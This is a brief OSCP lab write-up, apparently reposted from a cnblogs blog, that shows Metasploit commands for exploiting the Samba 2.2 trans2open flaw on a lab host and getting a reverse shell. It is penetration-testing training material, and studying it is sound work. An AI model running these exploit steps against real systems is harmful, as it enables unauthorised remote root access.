编程语言
首页 > 编程语言> > OSCP Security Technology - Gaining Root with Metasploit

OSCP Security Technology - Gaining Root with Metasploit

作者:互联网

OSCP Security Technology - Gaining Root with Metasploit

Analysis nmap scanning result.

image-20210707075501995

searchsploit samba 2.2 

image-20210707080027869

msfconsole
search trans2open
use exploit/linux/samba/trans2open
show options

image-20210707080550750

set rhost 192.168.2.28
show targets
exploit

image-20210707081352600

We need change the payload setting.

show options
set payload generic/shell_reverse_tcp
exploit

image-20210707081648763

image-20210707081948209

标签:Gaining,Metasploit,set,show,trans2open,exploit,samba,Technology
来源: https://www.cnblogs.com/keepmoving1113/p/14979824.html